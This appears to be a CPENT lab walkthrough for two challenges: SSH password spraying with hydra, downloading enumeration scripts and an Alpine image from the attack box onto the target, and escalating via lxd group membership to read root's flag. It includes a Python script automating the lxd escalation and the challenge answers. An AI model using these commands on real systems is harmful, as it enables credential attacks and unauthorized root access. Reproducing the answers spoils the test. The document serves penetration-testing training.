PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 1619792a62e3e6e83345234167c17b99 (RSA)
|   256 4d34eb934802773e1160177936e1bb4f (ECDSA)
|_  256 f38fb12d46333961a74faf68320c0310 (ED25519)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 3.12 (94%), Linux 4.4 (94%), Linux 3.10 (93%), Linux 3.10 - 3.16 (93%), Linux 4.9 (93%), Linux 4.0 (93%), Linux 2.6.18 (90%), Linux 3.10 - 4.11 (89%), Linux 3.11 - 4.1 (89%), Linux 3.2 - 4.9 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 22/tcp)
HOP RTT      ADDRESS
1   62.31 ms 192.168.200.1
2   10.14 ms 172.16.20.7

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 5.80 seconds

Only SSH is open, so brute-force it. Use the username and password lists supplied with the course (Usernames-CPENT.txt / Passwords-CPENT.txt). One thing to watch: if you run the command as is:

hydra -L Usernames-CPENT.txt -P Passwords-CPENT.txt ssh://172.16.20.7

hydra walks all 52 passwords for one user before moving on to the next user, so a hit on a user late in the list only surfaces after every earlier user has been exhausted. Adding -u switches to the password-spraying order (one password against every user, then the next password); see:

Using Hydra to Spray User Passwords

Note that -u does not reduce the total of 1820 attempts, it only reorders them: a weak password that any account happens to use shows up within one pass over the user list, each account receives at most one guess per pass (which is what keeps you under account-lockout thresholds), and you can abort the run as soon as a hit appears. In short, append -u.

┌──(root㉿kali)-[/home/kali/LPT_day1]
└─# hydra -L Usernames-CPENT.txt -P Passwords-CPENT.txt ssh://172.16.20.7 -u
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-03-26 03:53:17
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 1820 login tries (l:35/p:52), ~114 tries per task
[DATA] attacking ssh://172.16.20.7:22/
[22][ssh] host: 172.16.20.7   login: jason   password: qwerty
[STATUS] 322.00 tries/min, 322 tries in 00:01h, 1501 to do in 00:05h, 13 active
[STATUS] 317.67 tries/min, 953 tries in 00:03h, 871 to do in 00:03h, 12 active
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 9 final worker threads did not complete until end.
[ERROR] 9 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-03-26 03:57:36
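To make the ordering point concrete, here is a small simulation of hydra's two attempt orders. It is an added example, not code from the original post or from hydra; the user and password lists are constructed stand-ins for Usernames-CPENT.txt / Passwords-CPENT.txt, and the 35x52 shape of the real run is only used to reproduce hydra's "1820 login tries" count.

```python
"""Why -u changes when jason:qwerty surfaces: it reorders hydra's attempts, it does not cut them.

Added example (not part of the original post or of hydra). USERS/PASSWORDS are
constructed stand-ins for the course wordlists; only their shape matters.
"""

# Constructed sample lists (assumption: the real lists are longer, 35 users x 52 passwords).
USERS = ["administrator", "itop", "jason", "alice", "bob"]
PASSWORDS = ["123456", "qwerty", "password", "letmein", "jason2023"]


def attempt_order(users, passwords, loop_users=False):
    """Sequence of (user, password) guesses hydra would make.

    Default: exhaust the whole password list for one user before moving on (user-major).
    -u (loop_users=True): try one password against every user, then the next password
    (password-major); this is the spraying order.
    """
    if loop_users:
        return [(u, p) for p in passwords for u in users]
    return [(u, p) for u in users for p in passwords]


def tries_until_hit(users, passwords, valid, loop_users=False):
    """1-based position of the valid pair in the order; lower means it surfaces sooner."""
    return attempt_order(users, passwords, loop_users).index(valid) + 1


def worst_case_burst(order, window):
    """Most guesses any single account receives within `window` consecutive attempts.

    Lockout policies count failures per account inside a time window, so this is the
    figure to keep below the lockout threshold; the spraying order drives it to 1.
    """
    worst = 0
    for start in range(len(order) - window + 1):
        counts = {}
        for user, _ in order[start:start + window]:
            counts[user] = counts.get(user, 0) + 1
        worst = max(worst, max(counts.values()))
    return worst


if __name__ == "__main__":
    valid = ("jason", "qwerty")
    for label, loop in (("default", False), ("-u", True)):
        order = attempt_order(USERS, PASSWORDS, loop)
        print(f"{label:8} total={len(order)} "
              f"hit_at={tries_until_hit(USERS, PASSWORDS, valid, loop)} "
              f"burst(window=5)={worst_case_burst(order, 5)}")
```

Both orders contain exactly the same 25 pairs (1820 for the real 35x52 lists); what differs is where the valid pair sits and how many guesses any one account absorbs in a row, which is the property that matters against sshd rate limits and account-lockout policies.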

With the credentials found, SSH in from the attack box. (The trailing "[ERROR] 9 targets did not resolve or could not be connected" line is typically the nine leftover worker threads failing to reconnect once sshd throttles parallel connections; hydra's own warning at the top suggests -t 4 for SSH targets to avoid it.)

┌──(root㉿kali)-[/home/kali/LPT_day1]
└─# ssh jason@172.16.20.7
The authenticity of host '172.16.20.7 (172.16.20.7)' can't be established.
ED25519 key fingerprint is SHA256:4uiYffWeZsCsbqxYDpnCxpCpI9a5xqSAytffNxlSD60.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '172.16.20.7' (ED25519) to the list of known hosts.
jason@172.16.20.7's password:
Welcome to Ubuntu 18.04 LTS (GNU/Linux 4.15.0-20-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Sun Mar 26 18:13:49 CST 2023

  System load:  0.0                Processes:           119
  Usage of /:   3.2% of 124.01GB   Users logged in:     2
  Memory usage: 11%                IP address for eth0: 172.16.20.7
  Swap usage:   0%


 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

298 packages can be updated.
196 updates are security updates.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Sat Sep 24 10:01:15 2022 from 172.16.1.1
jason@ubuntu:~$

Once in, locate the file with find -name <filename> -print 2>/dev/null, run from / so the whole filesystem is searched; the 2>/dev/null drops the permission-denied noise:

jason@ubuntu:~$ cd /
jason@ubuntu:/$ find -name userflag.txt -print 2>/dev/null
./home/jason/Documents/userflag.txt
jason@ubuntu:/$ cat ./home/jason/Documents/userflag.txt
bu79g82xap
jason@ubuntu:/$ md5sum ./home/jason/Documents/userflag.txt
c43b63f879784511a5914c7ee930d5bf  ./home/jason/Documents/userflag.txt

5 (Challenge 29) Compromise the machine with IP address 172.25.20.7, find the file userflag.txt and enter its content as the answer. Ans: bu79g82xap

Next comes privilege escalation for rootflag.txt, which starts with getting the enumeration scripts (LinEnum and linpeas) onto the target. First stand up a simple HTTP server on the attack box, in the directory holding the scripts:

┌──(root㉿kali)-[/home/kali]
└─# python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

Then switch to the SSH session on the target and have it fetch LinEnum from the attack box (linpeas is fetched the same way). /tmp is used because it is the one directory jason is sure to have write access to:

jason@ubuntu:/$ cd /tmp
jason@ubuntu:/tmp$ wget http://192.168.200.4/LinEnum.sh
--2023-03-26 18:24:20--  http://192.168.200.4/LinEnum.sh
Connecting to 192.168.200.4:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 46631 (46K) [text/x-sh]
Saving to: ‘LinEnum.sh’

LinEnum.sh              100%[===============================>]  45.54K  --.-KB/s    in 0.06s

2023-03-26 18:24:20 (804 KB/s) - ‘LinEnum.sh’ saved [46631/46631]

jason@ubuntu:/tmp$ ls -al
total 88
drwxrwxrwt 10 root  root   4096 Mar 26 18:24 .
drwxr-xr-x 23 root  root   4096 Dec 23  2021 ..
drwxrwxrwt  2 root  root   4096 Dec 23  2021 .font-unix
drwxrwxrwt  2 root  root   4096 Dec 23  2021 .ICE-unix
-rw-rw-r--  1 jason jason 46631 Mar 12 16:03 LinEnum.sh
drwx------  3 root  root   4096 Dec 23  2021 systemd-private-8a779ead8eb64e009842b22ee304b506-systemd-resolved.service-T3HiFE
drwx------  3 root  root   4096 Dec 23  2021 systemd-private-8a779ead8eb64e009842b22ee304b506-systemd-timesyncd.service-tZ652O
drwxrwxrwt  2 root  root   4096 Dec 23  2021 .Test-unix
drwx------  2 itop  itop   4096 Feb 23  2022 tmux-1000
drwxrwxrwt  2 root  root   4096 Dec 23  2021 .X11-unix
drwxrwxrwt  2 root  root   4096 Dec 23  2021 .XIM-unix
jason@ubuntu:/tmp$ chmod +x LinEnum.sh

After running the scripts, one finding stands out: the user is a member of the lxd group. That is effectively root. The LXD daemon runs as root, and anyone who can talk to its socket can create a privileged container with the host's filesystem mounted inside it:

[-] Current user/group info:
uid=1001(jason) gid=1001(jason) groups=1001(jason),108(lxd)
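The check behind that LinEnum line, as a stand-alone script you can run on any box or over a copied /etc/group. This is an added example, not part of the original post or of LinEnum/linpeas; SAMPLE_ID is the id line from the session above, SAMPLE_GROUP_FILE is a constructed excerpt, and the list of high-risk groups is an assumption you should extend for your own environment.

```python
"""Spot root-equivalent group memberships from `id` output or from /etc/group.

Added example, not code from the original post or from LinEnum/linpeas.
SAMPLE_ID is taken from the session above; SAMPLE_GROUP_FILE is constructed.
"""
import re

# Groups that hand out root (or its password hashes) without any sudoers rule.
# Assumption: this is the usual short list; extend it for your environment.
HIGH_RISK_GROUPS = {
    "lxd": "member can start a privileged container with the host's / mounted inside",
    "docker": "member can run a container with -v /:/host as root",
    "disk": "member can read and write block devices, bypassing file permissions",
    "shadow": "member can read the password hashes in /etc/shadow",
    "sudo": "sudo access; check /etc/sudoers for the actual rule",
    "wheel": "sudo/su access on distributions that use wheel",
}

ID_GROUP_RE = re.compile(r"(\d+)\(([^)]+)\)")


def groups_from_id(id_line):
    """Parse the groups= field of `id` output into {gid: name}."""
    m = re.search(r"groups=(\S+)", id_line)
    if not m:
        return {}
    return {int(gid): name for gid, name in ID_GROUP_RE.findall(m.group(1))}


def risky_memberships(id_line):
    """{group: reason} for each high-risk group the current user belongs to."""
    names = set(groups_from_id(id_line).values())
    return {g: HIGH_RISK_GROUPS[g] for g in sorted(names) if g in HIGH_RISK_GROUPS}


def audit_group_file(group_text):
    """Scan /etc/group text; return {group: [non-root members]} for high-risk groups."""
    findings = {}
    for line in group_text.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 4:
            continue  # malformed line: skip rather than guess
        name, _, _, members = fields
        users = [u for u in members.split(",") if u and u != "root"]
        if name in HIGH_RISK_GROUPS and users:
            findings[name] = users
    return findings


# Sample inputs: the id line from the session above, and a constructed /etc/group excerpt.
SAMPLE_ID = "uid=1001(jason) gid=1001(jason) groups=1001(jason),108(lxd)"
SAMPLE_GROUP_FILE = """root:x:0:
sudo:x:27:administrator
lxd:x:108:jason
docker:x:999:
jason:x:1001:
"""

if __name__ == "__main__":
    for group, reason in risky_memberships(SAMPLE_ID).items():
        print(f"[!] current user is in {group}: {reason}")
    for group, users in audit_group_file(SAMPLE_GROUP_FILE).items():
        print(f"[!] /etc/group: {group} -> {', '.join(users)}")
```

On a live host feed it real data: audit_group_file(open("/etc/group").read()) for the defender's view, or risky_memberships(subprocess.check_output(["id"], text=True)) for the attacker's. Membership in lxd is a finding whether or not LXD is currently running; the daemon is socket-activated on Ubuntu, so the first lxc call brings it up.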

A quick search for lxd privilege escalation turns up the exploit-db entry, whose header reads:

# Step 1: Download build-alpine => wget https://raw.githubusercontent.com/saghul/lxd-alpine-builder/master/build-alpine [Attacker Machine]
# Step 2: Build alpine => bash build-alpine (as root user) [Attacker Machine]
# Step 3: Run this script and you will get root [Victim Machine]
# Step 4: Once inside the container, navigate to /mnt/root to see all resources from the host machine

Here, though, the escalation follows the write-up on the page below:

Lxd Privilege Escalation - Hacking Articles

Per that page, the steps on the attack box are:

  • Download build-alpine in your local machine through the git repository. (clone it with git)

  • Execute the script "build-alpine" that will build the latest Alpine image as a compressed file; this step must be executed by the root user. (run the build after cloning)

  • Transfer the tar file to the host machine. (send the resulting tar to the target)

    The output below covers steps 1 and 2 and ends with the tar file.

┌──(root㉿kali)-[/home/kali/LPT_day2]
└─# git clone  https://github.com/saghul/lxd-alpine-builder.git
Cloning into 'lxd-alpine-builder'...
remote: Enumerating objects: 50, done.
remote: Counting objects: 100% (8/8), done.
remote: Compressing objects: 100% (6/6), done.
remote: Total 50 (delta 2), reused 5 (delta 2), pack-reused 42
Receiving objects: 100% (50/50), 3.11 MiB | 8.39 MiB/s, done.
Resolving deltas: 100% (15/15), done.

┌──(root㉿kali)-[/home/kali/LPT_day2]
└─# cd lxd-alpine-builder

┌──(root㉿kali)-[/home/kali/LPT_day2/lxd-alpine-builder]
└─# ./build-alpine
Determining the latest release... v3.17
Using static apk from http://dl-cdn.alpinelinux.org/alpine//v3.17/main/x86_64
Downloading alpine-keys-2.4-r1.apk
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
Downloading apk-tools-static-2.12.10-r1.apk
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
alpine-devel@lists.alpinelinux.org-6165ee59.rsa.pub: OK
Verified OK
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  2573  100  2573    0     0    587      0  0:00:04  0:00:04 --:--:--   587
--2023-03-27 01:38:34--  http://alpine.mirror.wearetriple.com/MIRRORS.txt
Resolving alpine.mirror.wearetriple.com (alpine.mirror.wearetriple.com)... 93.187.10.106, 2a00:1f00:dc06:10::106
Connecting to alpine.mirror.wearetriple.com (alpine.mirror.wearetriple.com)|93.187.10.106|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2573 (2.5K) [text/plain]
Saving to: ‘/home/kali/LPT_day2/lxd-alpine-builder/rootfs/usr/share/alpine-mirrors/MIRRORS.txt’

/home/kali/LPT_day2/lxd 100%[===============================>]   2.51K  --.-KB/s    in 0s

2023-03-27 01:38:35 (299 MB/s) - ‘/home/kali/LPT_day2/lxd-alpine-builder/rootfs/usr/share/alpine-mirrors/MIRRORS.txt’ saved [2573/2573]

Selecting mirror http://download.nus.edu.sg/mirror/alpine//v3.17/main
fetch http://download.nus.edu.sg/mirror/alpine//v3.17/main/x86_64/APKINDEX.tar.gz
(1/25) Installing alpine-baselayout-data (3.4.0-r0)
(2/25) Installing musl (1.2.3-r4)
(3/25) Installing busybox (1.35.0-r29)
Executing busybox-1.35.0-r29.post-install
(4/25) Installing busybox-binsh (1.35.0-r29)
(5/25) Installing alpine-baselayout (3.4.0-r0)
Executing alpine-baselayout-3.4.0-r0.pre-install
Executing alpine-baselayout-3.4.0-r0.post-install
(6/25) Installing ifupdown-ng (0.12.1-r1)
(7/25) Installing libcap2 (2.66-r0)
(8/25) Installing openrc (0.45.2-r7)
Executing openrc-0.45.2-r7.post-install
(9/25) Installing mdev-conf (4.3-r0)
(10/25) Installing busybox-mdev-openrc (1.35.0-r29)
(11/25) Installing alpine-conf (3.15.1-r1)
(12/25) Installing alpine-keys (2.4-r1)
(13/25) Installing alpine-release (3.17.2-r0)
(14/25) Installing ca-certificates-bundle (20220614-r4)
(15/25) Installing libcrypto3 (3.0.8-r1)
(16/25) Installing libssl3 (3.0.8-r1)
(17/25) Installing ssl_client (1.35.0-r29)
(18/25) Installing zlib (1.2.13-r0)
(19/25) Installing apk-tools (2.12.10-r1)
(20/25) Installing busybox-openrc (1.35.0-r29)
(21/25) Installing busybox-suid (1.35.0-r29)
(22/25) Installing scanelf (1.3.5-r1)
(23/25) Installing musl-utils (1.2.3-r4)
(24/25) Installing libc-utils (0.7.2-r3)
(25/25) Installing alpine-base (3.17.2-r0)
Executing busybox-1.35.0-r29.trigger
OK: 10 MiB in 25 packages

┌──(root㉿kali)-[/home/kali/LPT_day2/lxd-alpine-builder]
└─# ls -al
total 6936
drwxr-xr-x 3 root root    4096 Mar 27 01:38 .
drwxr-xr-x 3 root root    4096 Mar 27 01:38 ..
-rw-r--r-- 1 root root 3259593 Mar 27 01:38 alpine-v3.13-x86_64-20210218_0139.tar.gz
-rw-r--r-- 1 root root 3785850 Mar 27 01:38 alpine-v3.17-x86_64-20230327_0138.tar.gz
-rwxr-xr-x 1 root root    8060 Mar 27 01:38 build-alpine
drwxr-xr-x 8 root root    4096 Mar 27 01:38 .git
-rw-r--r-- 1 root root   26530 Mar 27 01:38 LICENSE
-rw-r--r-- 1 root root     768 Mar 27 01:38 README.md

┌──(root㉿kali)-[/home/kali/LPT_day2/lxd-alpine-builder]
└─# cp alpine-v3.13-x86_64-20210218_0139.tar.gz /home/kali/LPT_day2

┌──(root㉿kali)-[/home/kali/LPT_day2/lxd-alpine-builder]
└─# cp alpine-v3.17-x86_64-20230327_0138.tar.gz /home/kali/LPT_day2

Step 3 is transferring the tar to the target, so start an HTTP server in the directory that holds the tar (note that the repository also ships a prebuilt alpine-v3.13 tarball; either one works):

┌──(root㉿kali)-[/home/kali/LPT_day2]
└─# python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

On the target, the steps are:

  • Download the alpine image (wget it from the attack box)

  • Import the image into lxd (lxc image import <tar file> --alias myimage)

  • Initialise a container from the image as a privileged container (lxc init myimage ignite -c security.privileged=true). Privileged means no uid mapping: uid 0 inside the container is uid 0 on the host.

  • Add a disk device that mounts the host's / at /mnt/root inside the container, then start it and get a shell:

    lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
    lxc start ignite
    lxc exec ignite /bin/sh


    In practice:

jason@ubuntu:/tmp$ wget http://192.168.200.4/alpine-v3.17-x86_64-20230327_0138.tar.gz
--2023-03-27 14:04:48--  http://192.168.200.4/alpine-v3.17-x86_64-20230327_0138.tar.gz
Connecting to 192.168.200.4:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3785850 (3.6M) [application/gzip]
Saving to: ‘alpine-v3.17-x86_64-20230327_0138.tar.gz’

alpine-v3.17-x86_64-202 100%[===============================>]   3.61M  3.61MB/s    in 1.0s

2023-03-27 14:04:49 (3.61 MB/s) - ‘alpine-v3.17-x86_64-20230327_0138.tar.gz’ saved [3785850/3785850]

jason@ubuntu:/tmp$ lxc image import alpine-v3.17-x86_64-20230327_0138.tar.gz --alias myimage
Image imported with fingerprint: 537f5b1127b5255f9e7eb9d715dc7883ba4274ea343162f2decd710dbd76c5d5
jason@ubuntu:/tmp$ lxc image list
+---------+--------------+--------+-------------------------------+--------+--------+------------------------------+
|  ALIAS  | FINGERPRINT  | PUBLIC |          DESCRIPTION          |  ARCH  |  SIZE  |         UPLOAD DATE          |
+---------+--------------+--------+-------------------------------+--------+--------+------------------------------+
| myimage | 537f5b1127b5 | no     | alpine v3.17 (20230327_01:38) | x86_64 | 3.61MB | Mar 27, 2023 at 6:05am (UTC) |
+---------+--------------+--------+-------------------------------+--------+--------+------------------------------+
|         | cd73881adaac | no     | alpine v3.13 (20210218_01:39) | x86_64 | 3.11MB | Mar 27, 2023 at 5:47am (UTC) |
+---------+--------------+--------+-------------------------------+--------+--------+------------------------------+
jason@ubuntu:/tmp$ lxc init myimage ignite -c security.privileged=true
Creating ignite
jason@ubuntu:/tmp$ lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
Device mydevice added to ignite
jason@ubuntu:/tmp$ lxc start ignite
jason@ubuntu:/tmp$ lxc exec ignite /bin/sh
~ # id
uid=0(root) gid=0(root)
~ #
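The same target-side sequence, wrapped with the checks the manual session skips: confirming lxd membership and an lxc client before touching anything, and verifying that the fingerprint lxc reports after import equals the SHA-256 of the tarball that was uploaded (LXD names a unified image tarball by the hash of the file, so a mismatch means a corrupted or swapped transfer). This is an added example, not code from the original post or from the Hacking Articles write-up; it assumes the tarball is in the current directory and that lxc is on PATH, and the device name hostroot is an arbitrary choice.

```python
"""Target-side LXD escalation with precondition and integrity checks.

Added example, not code from the original post. Everything that actually runs
lxc lives in main(); the helpers are pure so they can be exercised offline.
Assumptions: tarball in the current directory, `lxc` on PATH, user in group lxd.
"""
import hashlib
import re
import shutil
import subprocess
import sys

FINGERPRINT_RE = re.compile(r"fingerprint:\s*([0-9a-f]{64})")


def current_groups(id_ng_output):
    """Parse `id -nG` output ("jason lxd") into a set of group names."""
    return set(id_ng_output.split())


def tarball_fingerprint(data):
    """LXD's fingerprint for a unified image tarball is the SHA-256 of the file itself."""
    return hashlib.sha256(data).hexdigest()


def parse_import_fingerprint(import_output):
    """Pull the fingerprint out of 'Image imported with fingerprint: <hex>'."""
    m = FINGERPRINT_RE.search(import_output)
    if not m:
        raise ValueError(f"no fingerprint in lxc output: {import_output!r}")
    return m.group(1)


def target_side_commands(tarball, alias="myimage", container="ignite", mount="/mnt/root"):
    """The sequence from the manual session above, as argv lists.

    security.privileged=true disables uid mapping, so root inside is host root;
    the disk device bind-mounts the host's / at `mount` with that mapping in force
    (recursive=true pulls in submounts such as a separate /home).
    """
    return [
        ["lxc", "image", "import", tarball, "--alias", alias],
        ["lxc", "init", alias, container, "-c", "security.privileged=true"],
        ["lxc", "config", "device", "add", container, "hostroot", "disk",
         "source=/", "path=" + mount, "recursive=true"],
        ["lxc", "start", container],
    ]


def cleanup_commands(alias="myimage", container="ignite"):
    """Remove the container and image afterwards so the box is left as found."""
    return [["lxc", "delete", "--force", container], ["lxc", "image", "delete", alias]]


def main(tarball):
    groups = current_groups(subprocess.check_output(["id", "-nG"], text=True))
    if "lxd" not in groups:
        sys.exit("current user is not in the lxd group; this path does not apply")
    if shutil.which("lxc") is None:
        sys.exit("lxc client not found on PATH")
    with open(tarball, "rb") as f:
        expected = tarball_fingerprint(f.read())
    cmds = target_side_commands(tarball)
    reported = parse_import_fingerprint(subprocess.check_output(cmds[0], text=True))
    if reported != expected:
        sys.exit(f"fingerprint mismatch: lxc reports {reported}, file hashes to {expected}")
    for cmd in cmds[1:]:
        subprocess.run(cmd, check=True)
    # Interactive root shell; the host filesystem is under /mnt/root inside the container.
    subprocess.run(["lxc", "exec", "ignite", "/bin/sh"])


if __name__ == "__main__":
    main(sys.argv[1] if len(sys.argv) > 1 else "alpine-v3.17-x86_64-20230327_0138.tar.gz")
```

The fingerprint check is cheap and worth keeping: in the session above, lxc reported 537f5b11...76c5d5, and `sha256sum` of the uploaded tarball on the target should print the same value. Run the cleanup_commands sequence when done; a stray privileged container with the host's / mounted is exactly the kind of artifact a client would not want left behind.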

With root inside the container, run find again. The host's filesystem is the tree under /mnt/root, so the flag path is prefixed with it:

~ # cd /mnt/root/root
/mnt/root/root # cd /
/ # find -name rootflag.txt
./mnt/root/home/administrator/Documents/rootflag.txt
find: ./sys/kernel/debug: Permission denied
/ # cat ./mnt/root/home/administrator/Documents/rootflag.txt
p5bh39md4k7

6 (Challenge 30) Compromise the machine with IP address 172.25.20.7, find the file rootflag.txt, and enter its content as the answer. Ans: p5bh39md4k7